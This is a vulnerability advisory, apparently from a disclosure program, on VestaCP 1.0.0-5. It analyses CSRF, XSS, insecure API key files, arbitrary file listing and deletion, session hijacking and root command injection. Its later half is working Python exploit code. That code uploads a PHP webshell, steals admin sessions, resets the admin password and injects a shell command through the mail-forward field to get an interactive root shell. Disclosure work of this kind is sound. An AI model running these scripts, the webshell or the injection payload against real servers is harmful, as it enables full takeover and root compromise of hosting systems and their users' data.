SSD Advisory – VestaCP Multiple Vulnerabilities

TL;DR

Find out how multiple vulnerabilities in VestaCP allow remote attackers to take over the product.

Vulnerability Summary

While researching VestaCP source code, multiple critical vulnerabilities have been found, when chained together they would lead to RCE’s and LPE’s as Admin and eventually obtain root

CVE

TBD

Credit

Two independent security researchers, rekter0 and 0xkasper, have reported this to the SSD Secure Disclosure program.

Affected Versions

  • VestaCP 1.0.0-5 (latest)

Vendor Response

We have reached out to VestaCP dev team view email but have not received any kind of response.

Vulnerability Analysis

FileManager CSRF

Details

Each Hosting account including admin account have access to a file manager where they could Add / Rename / Copy / Move / Archive / Extract / Backup / Delete / Chmod files and/or directories that are within their /home directory.

/web/file_manager/fm_api.php

$fm = new FileManager($user);
$fm->setRootDir($panel[$user]['HOME']);
$_REQUEST['action'] = empty($_REQUEST['action']) ? '' : $_REQUEST['action'];
switch ($_REQUEST['action']) {
    case 'cd':
        $dir = $_REQUEST['dir'];
        print json_encode($fm->ls($dir));
        break;
    case 'check_file_type':
        $dir = $_REQUEST['dir'];
        print json_encode($fm->checkFileType($dir));
        break;
    case 'rename_file':
        $dir = $_REQUEST['dir'];
        $item = $dir . '/' . $_REQUEST['item'];
        $target_name = $dir . '/' . $_REQUEST['target_name'];
        print json_encode($fm->renameFile($item, $target_name));
        break;
    case 'rename_directory':
        $dir = $_REQUEST['dir'];
        $item = $dir.$_REQUEST['item'];
        $target_name = $dir.$_REQUEST['target_name'];
        print json_encode($fm->renameDirectory($item, $target_name));
        break;
    case 'move_file':
        $item = $_REQUEST['item'];
        $target_name = $_REQUEST['target_name'];
        print json_encode($fm->renameFile($item, $target_name));
        break;
    case 'move_directory':
        $item = $_REQUEST['item'];
        $target_name = $_REQUEST['target_name'];
        print json_encode($fm->renameDirectory($item, $target_name));
        break;
    case 'delete_files':
        $dir = $_REQUEST['dir'];
        $item = $_REQUEST['item'];
        print json_encode($fm->deleteItem($dir, $item));
        break;
    case 'create_file':
        $dir = $_REQUEST['dir'];
        $filename = $_REQUEST['filename'];
        print json_encode($fm->createFile($dir, $filename));
        break;
    case 'create_dir':
        $dir = $_REQUEST['dir'];
        $dirname = $_REQUEST['dirname'];
        print json_encode($fm->createDir($dir, $dirname));
        break;
    case 'open_file':
        $dir = $_REQUEST['dir'];
        print json_encode($fm->open_file($dir));
        break;
    case 'copy_file':
        $dir = $_REQUEST['dir'];
        $target_dir = $_REQUEST['dir_target'];
        $filename   = $_REQUEST['filename'];
        $item       = $_REQUEST['item'];
        print json_encode($fm->copyFile($item, $dir, $target_dir, $filename));
        break;
    case 'copy_directory':
        $dir = $_REQUEST['dir'];
        $target_dir = $_REQUEST['dir_target'];
        $filename   = $_REQUEST['filename'];
        $item       = $_REQUEST['item'];
        print json_encode($fm->copyDirectory($item, $dir, $target_dir, $filename));
        break;
    case 'unpack_item':
        $dir = $_REQUEST['dir'];
        $target_dir = $_REQUEST['dir_target'];
        $filename   = $_REQUEST['filename'];
        $item       = $_REQUEST['item'];
        print json_encode($fm->unpackItem($item, $dir, $target_dir, $filename));
        break;
    case 'pack_item':
        $items      = $_REQUEST['items'];
        $dst_item   = $_REQUEST['dst_item'];
        print json_encode($fm->packItem($items, $dst_item));
        break;
    case 'backup':
        $path = $_REQUEST['path'];
        print json_encode($fm->backupItem($path));
        break;
    case 'chmod_item':
        $dir = $_REQUEST['dir'];
        $item = $_REQUEST['item'];
        $permissions = $_REQUEST['permissions'];
        print json_encode($fm->chmodItem($dir, $item, $permissions));
        break;
    default:
        //print json_encode($fm->init());
        break;
}

FileManager API rely on [$_REQUEST], which could be supplied via `GET|POST|COOKIE` user input.

This potentially leading to 13 High severity CSRF vulnerabilities in dangerous functionalities if abused by an attacker

chmod_item | backup | pack_item | unpack_item | copy_directory | copy_file | open_file | create_dir | create_file | delete_files | move_directory | move_file | rename_directory | rename_file.

Reflected XSS

Edit Web
While most API calls are specifying Content-Type HTTP header to be application/json, call to /v1/edit/web was found to not specify one, making PHP by default set it to text/html.

/web/api/v1/edit/web/index.php

[...]
> $v_domain = escapeshellarg($_GET['domain']);
[...]
$result = array(
    'username' => $v_username,
>   'domain' => $v_domain,
[...]
);
echo json_encode($result);

GET parameter domain is processed only by escapeshellarg() this would escape only single quotes ' and backslash \ potentially leading to reflected XSS

Edit File
Edit file API call also doesn’t explicitly set content-type header

if (!empty($_REQUEST['path'])) {
    $content = '';
    $path = $_REQUEST['path'];
    [...]
>   exec (VESTA_CMD . "v-open-fs-file {$user} ".escapeshellarg($path), $content, $return_var);
    if ($return_var != 0) {
        $error = 'Error while opening file'; // todo: handle this more styled
        exit;
    }
>   $content = implode("\n", $content)."\n";
} else {
    $content = '';
}
$result = array(
	'error' => $error,
>	'content' => $content
);
>echo json_encode($result);

This will print file content, a malicious Vesta User could write an XSS payload into a file in a directory they control Ex: /tmp, and use this functionality to trigger the XSS to target another Vesta user.

Directory Preview

As this is a paid plugin, so it would not be enabled by default.

/web/api/v1/list/directory/preview/index.php

if ((!isset($_SESSION['FILEMANAGER_KEY'])) || (empty($_SESSION['FILEMANAGER_KEY']))) {
    header("Location: /filemanager-not-purchased/");
    exit;
}
[...]
> $path_a = !empty($_REQUEST['dir_a']) ? $_REQUEST['dir_a'] : '';
> $path_b = !empty($_REQUEST['dir_b']) ? $_REQUEST['dir_b'] : '';
> $GLOBAL_JS  = '<script type="text/javascript">GLOBAL.START_DIR_A = "' . $path_a . '";</script>';
> $GLOBAL_JS .= '<script type="text/javascript">GLOBAL.START_DIR_B = "' . $path_b . '";</script>';

Both parameters dir_a and dir_b are user input from $_REQUEST and getting reflected inside of script tag without proper sanitization leading to reflected XSS.

Vesta WEBAPI

Vesta has another API interface that is designed to be an alternative interface or to be integrated within another application or script https://vestacp.com/docs/api/

/web/api/v1/index.php or /web/api/index.php

> if (isset($_POST['user']) || isset($_POST['hash'])) {
    // Authentication
>    if (empty($_POST['hash'])) {
>        if ($_POST['user'] != 'admin') {
            echo 'Error: authentication failed';
            exit;
        }

This API is accessible only via an API key or via admin account [user/password].

Security Misconfigurations

API Keys

Vesta WEB API could be authenticated via Admin account as well as API keys.

/web/api/v1/index.php or /web/api/index.php

>       $key = '/usr/local/vesta/data/keys/' . basename($_POST['hash']);
>       if (file_exists($key) && is_file($key)) {
>           exec(VESTA_CMD ."v-check-api-key ".escapeshellarg($key)." ".$v_ip,  $output, $return_var);
            unset($output);
            // Check API answer
            if ( $return_var > 0 ) {
                echo 'Error: authentication failed';
                exit;
            }
        } else {
            $return_var = 1;
        }

/bin/v-check-api-key

if [ -z "$1" ]; then
    echo "Error: key missmatch"
    exit 9
fi
key=$(basename $1)
[...]
if [ ! -e $VESTA/data/keys/$key ]; then
    echo "Error: key missmatch"
    echo "$date $time api $ip failed to login" >> $VESTA/log/auth.log
    exit 9
fi

API key is filename of any of the files that exists in directory /usr/local/vesta/data/keys/.

By default there’s no API key, but they could be generated using v-generate-api-key Vesta script.

/bin/v-generate-api-key

[...]
KEYS='/usr/local/vesta/data/keys/'
HASH=$(keygen)
[...]
if [ ! -d ${KEYS} ]; then
  mkdir ${KEYS}
fi
[...]
touch ${KEYS}${HASH}

This script could be only executed with admin account via API or from CLI with admin or root accounts.

ls -lia /usr/local/vesta/data/keys/
total 8
1810549 drwxr-xr-x  2 root root 4096 Dec  3 13:41 .
1816654 drwxr-xr-x 10 root root 4096 Dec  3 13:41 ..
1817104 -rw-r--r--  1 root root    0 Dec  3 13:41 lP-mK-rIEuJSfBQyycQuxKDLzfUKh78M

The created files would have bad permission that are readable by any user on the system leading to LPE.

Arbitrary Directory delete as root

When a Vesta user changes their stats settings to none it invokes v-delete-web-domain-stats.

/web/api/v1/edit/web/index.php

# Defining statistic dir
stats_dir="$HOMEDIR/$user/web/$domain/stats"
# Deleting dir content
rm -rf $stats_dir/*

a Vesta user can symlink the target directory to their home dir domain stats directory and then change their stats settings to none this would lead to deleting the directory with root privileges since constant VESTA_CMD invokes the script with sudo.

define('VESTA_CMD', '/usr/bin/sudo /usr/local/vesta/bin/');

Upload handler

Vesta has an API for file uploads accessible to any Vesta user including low privileged users accessible from /api/v1/upload Vesta Upload handler is an altered version of jQuery file upload plugin that could be found here: https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php

/web/api/v1/upload/UploadHandler.php

    protected function initialize() {
        switch ($this->get_server_var('REQUEST_METHOD')) {
            case 'OPTIONS':
            case 'HEAD':
                $this->head();
                break;
            case 'GET':
                $this->get();
                break;
            case 'PATCH':
            case 'PUT':
            case 'POST':
                $this->post();
                break;
            case 'DELETE':
                $this->delete();
                break;
            default:
                $this->header('HTTP/1.1 405 Method Not Allowed');
        }
    }

The upload handler process the request according to the HTTP method and supplied parameters.

dir parameter

Function get_upload_path is used almost by every file handling functionality in upload handler to determine the working directory.

/web/api/v1/upload/UploadHandler.php

    protected function get_upload_path($file_name = null, $version = null) {
>       $relocate_directory = $_GET['dir'];
        if (empty($relocate_directory)) {
            $relocate_directory = '/home/admin/'; // fallback dir
        }
        if ($relocate_directory[strlen($relocate_directory) -1] != '/') {
            $relocate_directory .= '/';
        }
        $file_name = $file_name ? $file_name : '';
        if (empty($version)) {
            $version_path = '';
        } else {
            $version_dir = @$this->options['image_versions'][$version]['upload_dir'];
            if ($version_dir) {
                return $version_dir.$this->get_user_path().$file_name;
            }
            $version_path = $version.'/';
        }
        //return $this->options['upload_dir'].$this->get_user_path()
        //    .$version_path.$file_name;
        return $relocate_directory
            .$version_path.$file_name;
    }

dir GET parameter was found to bypass the intended function use.

Arbitrary Directory files listing

When upload handler is called with GET http method it is processed with get() function

/web/api/v1/upload/UploadHandler.php

public function get($print_response = true) {
        if ($print_response && isset($_GET['download'])) {
            return $this->download();
        }
        $file_name = $this->get_file_name_param();
        if ($file_name) {
            $response = array(
                $this->get_singular_param_name() => $this->get_file_object($file_name)
            );
        } else {
            $response = array(
                $this->options['param_name'] => $this->get_file_objects()
            );
        }
        return $this->generate_response($response, $print_response);
    }

functions get_file_object and get_file_objects rely on get_upload_path enabling us to get a files listing on an arbitrary directory of our choosing that is accessible by unix admin user.
This could lead to sensitives files names disclosure including API keys.

Vesta PHP Sessions directory /usr/local/vesta/data/sessions has sessions with admin:admin permissions enabling an arbitrary Vesta user to obtain session IDs for any logged in Vesta user.

/web/inc/main.php

// Saving user IPs to the session for preventing session hijacking
>$user_combined_ip = $_SERVER['REMOTE_ADDR'];
if(isset($_SERVER['HTTP_CLIENT_IP'])){
    $user_combined_ip .=  '|'. $_SERVER['HTTP_CLIENT_IP'];
}
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
    $user_combined_ip .=  '|'. $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(isset($_SERVER['HTTP_FORWARDED_FOR'])){
    $user_combined_ip .=  '|'. $_SERVER['HTTP_FORWARDED_FOR'];
}
if(isset($_SERVER['HTTP_X_FORWARDED'])){
    $user_combined_ip .=  '|'. $_SERVER['HTTP_X_FORWARDED'];
}
if(isset($_SERVER['HTTP_FORWARDED'])){
    $user_combined_ip .=  '|'. $_SERVER['HTTP_FORWARDED'];
}
>if(!isset($_SESSION['user_combined_ip'])){
>    $_SESSION['user_combined_ip'] = $user_combined_ip;
>}
// Checking user to use session from the same IP he has been logged in
>if($_SESSION['user_combined_ip'] != $user_combined_ip && $_SERVER['REMOTE_ADDR'] != '127.0.0.1'){
    session_destroy();
    session_start();
    $_SESSION['request_uri'] = $_SERVER['REQUEST_URI'];
    header("Location: /login/");
    exit;
}

Sessions are tied to the original IP that logged in, but it could be bypassed when requests are originating from 127.0.0.1.

Arbitrary file delete

HTTP method DELETE for upload handler will delete files from files[] array.

/web/api/v1/upload/UploadHandler.php

    public function delete($print_response = true) {
        $file_names = $this->get_file_names_params();
        if (empty($file_names)) {
            $file_names = array($this->get_file_name_param());
        }
        $response = array();
        foreach($file_names as $file_name) {
            $file_path = $this->get_upload_path($file_name);
            $success = is_file($file_path) && $file_name[0] !== '.' && unlink($file_path);
            if ($success) {
                foreach($this->options['image_versions'] as $version => $options) {
                    if (!empty($version)) {
                        $file = $this->get_upload_path($file_name, $version);
                        if (is_file($file)) {
                            unlink($file);
                        }
                    }
                }
            }
            $response[$file_name] = $success;
        }
        return $this->generate_response($response, $print_response);
    }
}

Since the panel is running with admin user privileges, this will delete an arbitrary file where UNIX user admin has permission.

Host Header Injection

Host header injection password reset functionality.

In /web/api/v1/reset/index.php on line 35:

$mailtext .= __('PASSWORD_RESET_REQUEST',$_SERVER['HTTP_HOST'],$user,$rkey,$_SERVER['HTTP_HOST'],$user,$rkey);

Request’s Host header is put as host in the password reset link that is send to the user.

Command injection as root

The function update_object_value from /func/main.sh uses eval as root.

pdate_object_value() {
    row=$(grep -nF "$2='$3'" $USER_DATA/$1.conf)
    lnr=$(echo $row | cut -f 1 -d ':')
    object=$(echo $row | sed "s/^$lnr://")
    eval "$object"
    eval old="$4"
    old=$(echo "$old" | sed -e 's/\\/\\\\/g' -e 's/&/\\&/g' -e 's/\//\\\//g')
    new=$(echo "$5" | sed -e 's/\\/\\\\/g' -e 's/&/\\&/g' -e 's/\//\\\//g')
    sed -i "$lnr s/${4//$/}='${old//\*/\\*}'/${4//$/}='${new//\*/\\*}'/g" \
        $USER_DATA/$1.conf
}

This sink could be reached by multiple vesta functionality, some of which email forwarders which are not properly sanitized

/web/api/v1/edit/mail/index.php

    foreach ($result as $forward) {
            if ((empty($_SESSION['error_msg'])) && (!empty($forward))) {
                exec (VESTA_CMD."v-add-mail-account-forward ".$v_username." ".$v_domain." ".$v_account." ".escapeshellarg($forward), $output, $return_var);
                check_return_code($return_var,$output);
                unset($output);
            }
        }
    [...]
    if (($v_fwd_only != 'yes') && (!empty($_POST['v_fwd_only'])) && (empty($_SESSION['error_msg']))) {
        exec (VESTA_CMD."v-add-mail-account-fwd-only ".$v_username." ".$v_domain." ".$v_account, $output, $return_var);
        check_return_code($return_var,$output);
        unset($output);
        $v_fwd_only = 'yes';
    }

/web/api/v1/add/mail/index.php

if ((!empty($_POST['v_fwd'])) && (empty($_SESSION['error_msg']))) {
        $vfwd = preg_replace("/\n/", " ", $_POST['v_fwd']);
        $vfwd = preg_replace("/,/", " ", $vfwd);
        $vfwd = preg_replace('/\s+/', ' ',$vfwd);
        $vfwd = trim($vfwd);
        $fwd = explode(" ", $vfwd);
        foreach ($fwd as $forward) {
            $forward = escapeshellarg($forward);
            if (empty($_SESSION['error_msg'])) {
                exec (VESTA_CMD."v-add-mail-account-forward ".$user." ".$v_domain." ".$v_account." ".$forward, $output, $return_var);
                check_return_code($return_var,$output);
                unset($output);
            }
        }
    }
    // Add fwd_only flag
    if ((!empty($_POST['v_fwd_only'])) && (empty($_SESSION['error_msg']))) {
        exec (VESTA_CMD."v-add-mail-account-fwd-only ".$user." ".$v_domain." ".$v_account, $output, $return_var);
        check_return_code($return_var,$output);
        unset($output);
    }

Exploit

VestaFuncs.py

import requests
import re
import json
import socket
from urllib.parse import urlparse
import random
import string
import base64
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def resetPassword(username,targetHost,rkey):
	newPassword = get_random_string()
	r = requests.post(targetHost + '/api/v1/reset/index.php', verify=False, data={'password':newPassword,'password_confirm':newPassword, 'user':username,'code':rkey})
	if '"error":null,' in r.text:
		return newPassword
	else:
		return False
def checkSessions(us,targetHost,ipFromHostname,sessions,pwnDomain):
	for i in sessions:
		qTry = queryWebshell('echo `curl -k "https://127.0.0.1:'+str(urlparse(targetHost).port)+'/api/v1/login/session.php" -H "Cookie: PHPSESSID='+i+';" `;',ipFromHostname,pwnDomain)
		if '"root_dir":"\\/home\\/admin"' in qTry:
			print('[++] Admin session found ')
			return i,qTry
	print('[!] no admin session found')
	return False
def getSessIDs(us,targetHost,SessID):
	r = us.get(targetHost + '/api/v1/upload/index.php?dir=/usr/local/vesta/data/sessions', verify=False)
	try:
		if '{"files":' in r.text:
			myList = []
			for i in r.json()['files']:
				if SessID not in i['name']:
					myList.append(i['name'].replace('sess_',''))
			return myList
		else:
			print('Getting Sessions list Error')
			return False
	except Exception as e:
		print(str(e))
		return False
def getIPfromHostname(hostn):
	return socket.gethostbyname(urlparse(hostn).hostname)
def get_random_string(length=10):
    letters = string.ascii_letters+string.digits
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str
def getSession(us,targetHost,ss=1):
	sessPath ='/api/v1/login/index.php'
	if ss == 2:
		sessPath = '/api/v1/login/session.php'
	r = us.get(targetHost + sessPath, verify=False)
	try:
		if '"token":"' in r.text:
			return r.json()
		else:
			print('Getting own session data error')
			exit()
	except Exception as e:
		print(str(e))
		exit()
def login(us,targetHost,login,passwd):
	try:
		r = us.post(targetHost + '/api/v1/login/index.php', verify=False, data={'user':login,'password':passwd,'token':getSession(us,targetHost)['token']})
		if r.text:
			print('[+] Logged in as '+login)
			return True
		else:
			return False
	except Exception as e:
		print(str(e))
		return False
def logout(us,targetHost):
	r = us.get(targetHost + '/api/v1/logout/index.php', verify=False)
	print('[+] Logged out ')
def getWebshell(us,targetHost,shellHost,username,ipFromHostname):
	#r = us.get(targetHost + '/api/v1/delete/web/index.php?domain='+shellHost+'&token='+getSession(us,targetHost,2)['token'],verify=False)
	r = us.get(targetHost + '/api/v1/list/web/index.php', verify=False)
	if shellHost not in r.text:
		print('[!] '+shellHost+' not found, creating one...')
		r = us.get(targetHost + '/api/v1/add/web/index.php', verify=False)
		try:
			webConf = r.json()
			## Checking if IPs match
			if ipFromHostname not in r.text:
				print('[!] IP mismatch, select an appropriate IP for the '+shellHost)
				confIPsList = []
				count = 0
				for i in webConf['ips']:
					confIPsList.append(i)
					print('\t['+str(count)+'] '+i)
					count+=1
				selectedIP = confIPsList[int(input('\t> '))]
			else:
				selectedIP = ipFromHostname
			r2 = us.post(targetHost + '/api/v1/add/web/index.php' , verify=False, data={"ok": "add", "token": getSession(us,targetHost,2)['token'], "v_domain": shellHost, "v_ip": selectedIP, "v_aliases": "www."+shellHost, "v_dns": "on", "v_mail": "on", "v_proxy": "on", "v_proxy_ext": webConf['proxy_ext']})
			if 'has been created successfully' in r2.text:
				print('[+] '+shellHost+' added')
		except Exception as e:
			print(str(e))
			return False
	print('[+] '+shellHost+' found, looking up webshell')
	checkWS = queryWebshell('echo HelloVestaPWN3647387238263784;',ipFromHostname,shellHost)
	if('HelloVestaPWN3647387238263784' not in checkWS):
		print('[!] webshell not found, creating one..')
		r = us.post(targetHost+'/api/v1/upload/?dir=/home/'+username+'/web/'+shellHost+'/public_html',verify=False,files = {'files': ('ownwebshell.php', '<?php\nif(@$_GET["password"]!="e43c9f07ed59712efa492aa0ae259cd0") exit();\neval($_GET["e"]);')} )
		if('"name":"ownwebshell.php"' in r.text):
			print('[+] Webshell uploaded')
			return True
		else:
			print('[!] webshell upload error')
			return False
	else:
		print('[+] '+username+' webshell found')
		return True
def createMailBox(us,targetHost,shellHost,isDebug):
	mailAccount  = get_random_string().lower()
	mailPassword = get_random_string()
	r = us.get(targetHost + '/api/v1/delete/mail/index.php?domain='+shellHost+'&token='+getSession(us,targetHost,2)['token'],verify=False)
	r = us.get(targetHost + '/api/v1/list/mail/index.php', verify=False)
	if shellHost in r.text:
		if isDebug: print('[+] Mail domain found')
	else:
		if isDebug: print('[!] Mail domain not found, creating one..')
		r2 = us.post(targetHost + '/api/v1/add/mail/index.php', verify=False, data={"ok": "add", "token": getSession(us,targetHost,2)['token'], "v_domain": shellHost, "v_antispam": "on", "v_antivirus": "on", "v_dkim": "on"})
		if '"error_msg":null' in r2.text:
			if isDebug: print('[+] Mail domain created')
		else:
			print('[!] mail domain creating error')
			return False
	r = us.post(targetHost + '/api/v1/add/mail/index.php?domain='+shellHost,verify=False, data={"v_domain": shellHost, "v_account": mailAccount, "v_password": mailPassword, "Username": "@"+shellHost, "v_credentials": '', "ok_acc": "add", "token": getSession(us,targetHost,2)['token'], "Password": mailPassword})
	if '"error_msg":null' in r.text:
		if isDebug: print('[+] Mail account created')
		return {'account':mailAccount,'password':mailPassword}
	else:
		print('[!] creating new mail failed ..')
		return False
def editMailBox(us,targetHost,shellHost,Vaccount,payload,isDebug=True):
	r = us.post(targetHost + '/api/v1/edit/mail/index.php?domain='+shellHost+'&account='+Vaccount,verify=False, data={"save": "save", "token": getSession(us,targetHost,2)['token'], "v_domain": shellHost, "v_password": '', "v_quota": "unlimited", "v_aliases": '', "v_fwd": payload, "v_credentials": '', "Username": "@"+shellHost, "v_account": Vaccount, "Password": ''})
	if '"ok_msg":"Changes have been saved."' in r.text:
		return True
	else:
		if isDebug: print('[!] mailbox edit failed ..')
		return False
def b64en(strr):
	return base64.b64encode(strr.encode('utf-8')).decode('utf-8')
def deploycommand(cmd,ipFromHostname,pwnDomain):
	queryWebshell('echo `pwd;mkdir -p ./iamroot;`;',ipFromHostname,pwnDomain)
	queryWebshell('`printf '+b64en(cmd)+'|base64 -d > ./iamroot/cmdtoexec`;',ipFromHostname,pwnDomain)
def queryWebshell(cmd,ipFromHostname,shellHost='vestapwn.poc'):
	r = requests.get('http://'+ipFromHostname+'/ownwebshell.php?password=e43c9f07ed59712efa492aa0ae259cd0&e='+cmd,headers={'Host':shellHost},verify=False)
	return r.text

vestaATO.py

from VestaFuncs import *
import sys
import time
period = 0.5
if len(sys.argv) == 4:
	targetHost = sys.argv[1]
	targetUser = sys.argv[2]
	targetPass = sys.argv[3]
else:
	print("Usage\npython3 vestaROOT.py https://target_host:8083 user_login user_pass")
	exit()
ipFromHostname = getIPfromHostname(targetHost)
pwnDomain      = get_random_string().lower()+'.poc'
pwnDomainAdmin = get_random_string().lower()+'.poc'
while True:
	## init user session
	uus = requests.Session()
	## Login
	if login(uus,targetHost,targetUser,targetPass):
		usID  = uus.cookies.get_dict()['PHPSESSID']
		## Check own webshell
		if getWebshell(uus,targetHost,pwnDomain,targetUser,ipFromHostname):
			## Get other sessions IDs
			oSessIDs = getSessIDs(uus,targetHost,usID)
			if oSessIDs:
				print('[+] Obtained Sessions list : '+str(len(oSessIDs)))
				## Check other sessions IDs
				adminSession = checkSessions(uus,targetHost,ipFromHostname,oSessIDs,pwnDomain)
				## Admin session found
				if(adminSession):
					adminJSON = json.loads(adminSession[1])
					## Reset key found
					if adminJSON['data']['RKEY']:
						## Change admin password
						print('[+] admin RKEY '+adminJSON['data']['RKEY'])
						newAdminPassword = resetPassword('admin',targetHost, adminJSON['data']['RKEY'])
						if(newAdminPassword):
							print('[+] New admin account password ' +newAdminPassword)
							## Login as admin
							uus2 = requests.Session()
							if login(uus2,targetHost,'admin',newAdminPassword):
								## Check own webshell
								uWebshell = getWebshell(uus2,targetHost,pwnDomainAdmin,'admin',ipFromHostname)
								logout(uus2,targetHost)
								if 'admin' in queryWebshell('echo `whoami` ;',ipFromHostname,pwnDomainAdmin):
									queryWebshell('`mkdir -p ./func;echo "bash -c \\"\\\\$1\\"\nexit" > ./func/main.sh;` ;',ipFromHostname,pwnDomainAdmin)
									while True:
										print(queryWebshell('echo `VESTA=$(pwd) sudo /usr/local/vesta/bin/v-list-backup-host "'+input('# ').replace('"','\\"')+'"`;',ipFromHostname,pwnDomainAdmin))
								else:
									print('[!] Admin webshell not found ??')
						else:
							print('[!] admin password reset failed')
					else:
						print('[!] RKEY not found??')
			else:
				print('[!] no admin session found, restarting ..')
		## Logout
		logout(uus,targetHost)
		time.sleep(period)

vestaROOT.py

from VestaFuncs import *
import sys
if len(sys.argv) == 4:
	targetHost = sys.argv[1]
	targetUser = sys.argv[2]
	targetPass = sys.argv[3]
else:
	print("Usage\npython3 vestaROOT.py https://target_host:8083 user_login user_pass")
	exit()
ipFromHostname = getIPfromHostname(targetHost)
pwnDomain      = get_random_string().lower()+'.poc'
## init user session
uus = requests.Session()
## Login
if login(uus,targetHost,targetUser,targetPass):
	## Check own webshell
	if getWebshell(uus,targetHost,pwnDomain,targetUser,ipFromHostname):
		## Check, delete and create mailbox on pwnDomain
		mailBox = createMailBox(uus,targetHost,pwnDomain,True)
		if(mailBox):
			eMailBox = editMailBox(uus,targetHost,pwnDomain,mailBox['account'],'testPayload')
			if(eMailBox):
				## Deploy backdoor
				if editMailBox(uus,targetHost,pwnDomain,mailBox['account'],"';bash</home/"+targetUser+"/web/"+pwnDomain+"/public_html/iamroot/cmdtoexec>/home/"+targetUser+"/web/"+pwnDomain+"/public_html/iamroot/cmdresult;A='"):
					print('[+] root shell possibly obtained')
					while True:
						ucmd = input('# ')
						deploycommand(ucmd,ipFromHostname,pwnDomain)
						editMailBox(uus,targetHost,pwnDomain,mailBox['account'],"foobar",False)
						print(queryWebshell('echo `cat ./iamroot/cmdresult;`;',ipFromHostname,pwnDomain))
		## Logout
		logout(uus,targetHost)
		print('[+] Logged out')

Demo

?

Get in touch